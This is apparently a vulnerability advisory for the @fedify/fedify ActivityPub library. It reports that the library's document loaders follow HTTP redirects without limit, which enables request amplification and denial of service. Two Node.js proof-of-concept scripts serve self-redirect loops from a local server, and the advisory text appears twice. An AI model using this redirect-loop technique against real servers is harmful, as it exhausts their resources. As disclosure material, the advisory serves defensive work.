Summary
@fedify/fedify follows HTTP redirects recursively in its remote document loader and authenticated document loader without enforcing a maximum redirect count or visited-URL loop detection. An attacker who controls a remote ActivityPub key or actor URL can force a server using Fedify to make repeated outbound requests from a single inbound request, leading to resource consumption and denial of service.
Details
Fedify verifies ActivityPub HTTP signatures by fetching the remote keyId during request processing. The relevant flow is handleInboxInternal() -> verifyRequest() -> fetchKeyInternal() -> document loader.
In affected versions:
- the generic document loader recursively follows
3xx responses by calling load() again on the Location header
- the authenticated redirect path (
doubleKnock()) also recursively follows redirects
- neither path enforces a redirect cap or tracks visited URLs to detect self-referential redirect loops
As a result, if an attacker-controlled keyId or actor URL responds with 302 Location: <same URL>, a single ActivityPub request can trigger tens or hundreds of outbound requests before the fetch completes or the request times out.
I confirmed the issue in @fedify/fedify 1.9.1 and 1.9.2. By contrast, Fedify's WebFinger lookup path already has a redirect cap, which suggests the missing bound in the document loader is unintended.
Failed key fetches are not durably negatively cached. After a failed lookup, the null result is only remembered in a request-local cache, so later requests can trigger the same redirect loop again for the same keyId.
PoC
Minimal direct reproduction with the package:
- Install
@fedify/fedify@1.9.2.
- Save and run the following script:
import http from "node:http";
import { getDocumentLoader } from "@fedify/fedify";
const port = 45679;
let count = 0;
const redirectCount = 120;
const server = http.createServer((req, res) => {
count += 1;
if (count < redirectCount) {
res.writeHead(302, {
Location: `http://127.0.0.1:${port}/actor`,
});
res.end();
return;
}
res.writeHead(200, { "Content-Type": "application/activity+json" });
res.end(JSON.stringify({
"@context": "https://www.w3.org/ns/activitystreams",
"id": `http://127.0.0.1:${port}/actor`,
"type": "Person"
}));
});
await new Promise((resolve) => server.listen(port, "127.0.0.1", resolve));
try {
const loader = getDocumentLoader({ allowPrivateAddress: true });
await loader(`http://127.0.0.1:${port}/actor`);
console.log({ count });
} finally {
server.close();
}
- Observe output similar to:
This shows the loader followed 119 self-redirects before the first non-redirect response.
The authenticated loader used for signed requests shows the same behavior:
import http from "node:http";
import {
generateCryptoKeyPair,
getAuthenticatedDocumentLoader,
} from "@fedify/fedify";
const port = 45680;
let count = 0;
const redirectCount = 120;
const server = http.createServer((req, res) => {
count += 1;
if (count < redirectCount) {
res.writeHead(302, {
Location: `http://127.0.0.1:${port}/actor`,
});
res.end();
return;
}
res.writeHead(200, { "Content-Type": "application/activity+json" });
res.end(JSON.stringify({
"@context": "https://www.w3.org/ns/activitystreams",
"id": `http://127.0.0.1:${port}/actor`,
"type": "Person"
}));
});
await new Promise((resolve) => server.listen(port, "127.0.0.1", resolve));
try {
const { privateKey } = await generateCryptoKeyPair();
const loader = getAuthenticatedDocumentLoader(
{
privateKey,
keyId: new URL("https://example.com/users/index#main-key"),
},
{ allowPrivateAddress: true },
);
await loader(`http://127.0.0.1:${port}/actor`);
console.log({ count });
} finally {
server.close();
}
Impact
This is an unauthenticated denial-of-service / request amplification issue. Any Fedify-based server that verifies remote keys or loads remote ActivityPub documents can be forced to spend CPU time, worker time, connection slots, and outbound bandwidth following attacker-controlled redirects. A single inbound request can trigger a large number of outbound requests, and the attack can be repeated across requests because failed lookups are not durably negatively cached.
Misc Notes
This issue was surfaced by a Ghost ActivityPub user reporting the issue directly to Ghost. The above report was generated upon further investigation into the issue by the Ghost team. The original reporter should be credited for the discovery.
In case you accept this advisory please coordinate time of disclosure and credit with us
Summary
@fedify/fedifyfollows HTTP redirects recursively in its remote document loader and authenticated document loader without enforcing a maximum redirect count or visited-URL loop detection. An attacker who controls a remote ActivityPub key or actor URL can force a server using Fedify to make repeated outbound requests from a single inbound request, leading to resource consumption and denial of service.Details
Fedify verifies ActivityPub HTTP signatures by fetching the remote
keyIdduring request processing. The relevant flow ishandleInboxInternal()->verifyRequest()->fetchKeyInternal()-> document loader.In affected versions:
3xxresponses by callingload()again on theLocationheaderdoubleKnock()) also recursively follows redirectsAs a result, if an attacker-controlled
keyIdor actor URL responds with302 Location: <same URL>, a single ActivityPub request can trigger tens or hundreds of outbound requests before the fetch completes or the request times out.I confirmed the issue in
@fedify/fedify1.9.1 and 1.9.2. By contrast, Fedify's WebFinger lookup path already has a redirect cap, which suggests the missing bound in the document loader is unintended.Failed key fetches are not durably negatively cached. After a failed lookup, the null result is only remembered in a request-local cache, so later requests can trigger the same redirect loop again for the same
keyId.PoC
Minimal direct reproduction with the package:
@fedify/fedify@1.9.2.This shows the loader followed 119 self-redirects before the first non-redirect response.
The authenticated loader used for signed requests shows the same behavior:
Impact
This is an unauthenticated denial-of-service / request amplification issue. Any Fedify-based server that verifies remote keys or loads remote ActivityPub documents can be forced to spend CPU time, worker time, connection slots, and outbound bandwidth following attacker-controlled redirects. A single inbound request can trigger a large number of outbound requests, and the attack can be repeated across requests because failed lookups are not durably negatively cached.
Misc Notes
This issue was surfaced by a Ghost ActivityPub user reporting the issue directly to Ghost. The above report was generated upon further investigation into the issue by the Ghost team. The original reporter should be credited for the discovery.
In case you accept this advisory please coordinate time of disclosure and credit with us